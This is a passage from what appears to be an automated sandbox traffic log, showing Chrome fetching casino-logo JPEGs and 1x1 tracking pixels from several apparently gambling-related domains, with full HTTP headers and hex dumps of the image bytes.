                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-45d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE9[567],EU-GER-frankfurt-GLOBAL1-CACHE8[552,TCP_MISS,565],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6632b11eaaeba62eff08c8f3e2e010e7
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:56 UTC2126INData Raw: 11 a3 48 9d 1d b6 34 2e ec fa e7 a7 b7 99 e3 23 8b cb 07 90 89 8c 89 3a 4b 33 3e 0e 47 2c 75 00 ca 3a 3b d4 8c e3 10 1e 2d 0f 96 24 c6 51 00 6a 0e f9 62 c0 91 9e 06 24 ba b0 72 1c e3 89 7c 8a 78 e3 f1 7b 1c 6f e8 3c 6e 3a e4 70 17 b8 1b 2b 7b 89 26 98 31 b9 9c 41 65 71 6c c9 ee 39 dd b5 2e 82 33 00 49 06 a3 56 ac ec 7c b8 4c 9f 1c bf 51 2c 38 07 90 97 bf 43 ab b5 ae e8 d6 94 06 91 a2 3f a0 0c 78 96 89 19 f2 d4 ca 5d 90 ff 00 90 70 4d 98 92 fa d3 07 9a 9b 1b 6e 0f ea 38 e6 ce e5 f1 b7 5f 77 5a 97 31 c1 7d 24 36 d1 54 90 21 09 22 8d bb 44 8d 5f 44 70 f4 f1 8d 3d 26 51 7e 07 44 24 1b db 10 64 7f 53 c4 f4 e7 a1 2d ee 3e 63 88 c9 bf aa 71 2f ec 91 11 1f a5 8f 6f 2a bb 39 c9 78 5e 5b 99 e5 79 5d d5 9e 43 23 8f 94 b5 ed 96 0d 44 f6 b0 dd e4 24 99 a5 73 78 25 c8
                                                                                                                                                          Data Ascii: H4.#:K3>G,u:;-$Qjb$r|x{o<n:p+{&1Aeql9.3IV|LQ,8C?x]pMn8_wZ1}$6T!"D_Dp=&Q~D$dS->cq/o*9x^[y]C#D$sx%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          161192.168.2.54990590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC637OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3444"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[5],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE1[330],EU-GER-frankfurt-GLOBAL1-CACHE6[323,TCP_MISS,328],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 473555e2dbea7ab2a7b919b54e5a25dc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814485
                                                                                                                                                          X-CCDN-Expires: 2464134
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC13380INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          162192.168.2.54990490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC366OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4cb2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[1],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE7[431],EU-GER-frankfurt-GLOBAL1-CACHE7[410,TCP_MISS,430],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fc5a24ef29b720e5d09b448debedc156
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:56 UTC3882INData Raw: 30 61 d6 97 35 ad 94 f8 4e cb 32 67 22 47 6c a2 97 23 93 c9 e4 b2 33 e4 b2 f7 d7 39 4c 8d c3 ef b9 bd bc 99 e7 9a 43 e6 f2 39 66 63 4f 33 a2 a1 42 9d b0 09 4d 42 a8 c8 00 00 ec 11 95 6a bd 72 59 d8 92 78 93 33 ef 88 cc e2 e2 44 0c 04 43 b1 23 ae 9e 4e a3 ca 14 06 81 ce 11 2c 7e d3 8a 12 47 70 69 4d 43 0d 26 25 4e a1 17 38 e5 12 c7 2c a4 51 8b 05 a7 85 00 d5 aa 38 89 c5 3b 83 22 04 3b 12 3c d7 17 11 46 ca 36 9d d4 63 40 48 14 fd da 16 38 98 35 59 a8 88 a4 9d c3 bf 7f a6 a2 26 08 c0 3e 5a 64 e3 5b 1d a1 a5 40 e9 a9 9c 64 29 59 94 ab 0a 86 53 50 7e a3 ae a2 71 99 44 9c ba 64 dd e5 c8 5c 3f dd da 64 a4 f7 4d db d3 dc f7 07 42 19 54 fa 7f 66 96 a4 0e ef 28 bc f8 ae a3 c6 06 26 68 bf 43 95 0c 47 4a 8e bd 7c b5 26 21 01 cc 45 97 1f 82 46 b9 c8 b1 9c 44 2d 6c a4
                                                                                                                                                          Data Ascii: 0a5N2g"Gl#39LC9fcO3BMBjrYx3DC#N,~GpiMC&%N8,Q8;";<F6c@H85Y&>Zd[@d)YSP~qDd\?dMBTf(&hCGJ|&!EFD-l


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          163192.168.2.54990690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC366OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3af5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[1],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE4[372],EU-GER-frankfurt-GLOBAL1-CACHE12[365,TCP_MISS,369],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b8bb2e05d13c9db751eb29876e68c7ee
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814485
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC15093INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          164192.168.2.549902163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC369OUTGET /ocs/cc.png?1717972852372 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC419INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache37.l2hk3[6,0], cache2.l2sg3[40,0], ens-cache10.de5[204,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9e17179728563888651e
                                                                                                                                                          2024-06-09 22:40:56 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          165192.168.2.54990790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC554OUTGET /cc.png?r=9636637722 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[432],EU-GER-frankfurt-EDGE5-CACHE2[291,TCP_MISS,430],EU-FRA-paris-GLOBAL1-CACHE19[283],EU-FRA-paris-GLOBAL1-CACHE1[279,TCP_MISS,281],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 276
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 69830569917987ef3e4ed0405c8cec30
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:57 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          166192.168.2.54990823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC551OUTGET /cc.png?r=8690266696 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[297],EU-GER-frankfurt-EDGE4-CACHE2[292,TCP_MISS,296],EU-FRA-paris-GLOBAL1-CACHE6[285],EU-FRA-paris-GLOBAL1-CACHE24[279,TCP_MISS,282],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 267
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ed80237bae9ad85e47494db3f2bb0484
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:57 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          167192.168.2.54991090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC366OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[1],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE6[414],EU-GER-frankfurt-GLOBAL1-CACHE7[403,TCP_MISS,407],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 175bc874bfff3fbc16e3dbcea988d446
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814485
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
